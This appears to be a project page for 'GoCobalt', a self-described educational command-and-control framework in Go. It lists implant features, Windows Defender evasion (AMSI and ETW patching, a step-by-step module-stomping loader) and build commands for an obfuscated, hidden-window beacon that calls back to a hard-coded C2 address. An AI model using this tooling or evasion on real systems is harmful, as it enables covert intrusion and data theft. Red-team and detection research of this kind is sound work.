🛡️

GoCobalt

Educational C2 framework for security research

Active v0.1.0 Educational

[vm] N/A :Various

Tech Stack

Go gRPC SQLite MinGW Donut Garble

Requirements

• Go 1.24+
• MinGW-w64 (for C loaders)
• Donut (shellcode generation)
• UPX (optional packing)

Features

✓ Multi-platform implant (Windows/Linux/macOS)
✓ HTTP/HTTPS, DNS, TCP, SMB listeners
✓ gRPC operator API
✓ Malleable C2 profiles
✓ Multiple evasion techniques
✓ Shellcode loaders (module stomping)
✓ Garble obfuscation support

Purpose

GoCobalt is an educational C2 framework built to understand offensive security techniques. It’s designed for:

CTF competitions requiring C2 infrastructure
Authorized red team engagements
Security research and malware analysis education
Understanding detection/evasion dynamics

This is not production malware - it’s a learning tool.

Architecture

┌─────────────────────────────────────────────────────────────┐
│                      TEAM SERVER                             │
│  gRPC API │ Listeners │ Session Manager │ Task Queue        │
│  SQLite   │ Crypto    │ Payload Builder                     │
└─────────────────────────────────────────────────────────────┘
                            │
        ┌───────────────────┼───────────────────┐
        ▼                   ▼                   ▼
   HTTP/HTTPS            DNS C2            SMB/TCP
   Listener              Listener          Listener
        └───────────────────┼───────────────────┘
                            ▼
                    ┌───────────────┐
                    │    IMPLANT    │
                    │   (Beacon)    │
                    └───────────────┘

Component	Purpose
Team Server	Central C2 with gRPC API, listeners, SQLite persistence
Operator Client	CLI for interacting with sessions
Implant	Cross-platform beacon with command execution
Builder	Payload generator with encryption

Implant Capabilities

Built-in commands:

shell - Execute system commands
upload / download - File transfer
ps - Process listing
whoami - Current user context
sysinfo - System information

Communication features:

HTTP/HTTPS transport
XOR + Base64 encrypted config
Jittered sleep intervals
Configurable C2 URIs

Evasion Techniques

Research into Windows Defender bypass:

Technique	Implementation	Detection Status
AMSI Bypass	Patch AmsiScanBuffer	Working
ETW Bypass	Patch EtwEventWrite	Working
String Encryption	XOR encoding	Partial
Garble Obfuscation	Literal + tiny mode	Effective
Module Stomping	DLL .text overwrite	Bypasses Defender

Module Stomping

The most effective loader technique - loads a legitimate Microsoft DLL, overwrites its .text section with shellcode, then executes from trusted memory:

Load amsi.dll (signed Microsoft binary)
Mark .text section as RWX
Copy shellcode over original code
Execute from “legitimate” memory region

This bypasses signature-based detection because execution originates from a trusted module.

Building

# Team server
go build -o bin/teamserver ./cmd/teamserver

# Operator client
go build -o bin/client ./cmd/client

# Basic implant
GOOS=windows GOARCH=amd64 go build \
  -ldflags="-s -w -H windowsgui \
    -X main.C2URL=http://192.168.0.225:8080" \
  -o bin/beacon.exe ./cmd/implant

# Obfuscated implant (garble)
garble -literals -tiny -seed=random build \
  -ldflags="-s -w -H windowsgui" \
  -o bin/beacon-garble.exe ./cmd/implant

Usage

# Start team server
./bin/teamserver

# Connect operator client
./bin/client

# List active sessions
./bin/client sessions list

# Interact with a session
./bin/client interact <session-id>
> shell whoami
> sysinfo
> download C:\Users\target\Desktop\flag.txt

Disclaimer

This tool is for authorized security testing, red team operations, and educational purposes only. Users must ensure proper authorization before use against any systems.

Summary

Aspect	Description
Learning	Understand C2 architecture and evasion
Research	Test detection/bypass techniques
CTF	Ready infrastructure for competitions
Ethical	Built for authorized use only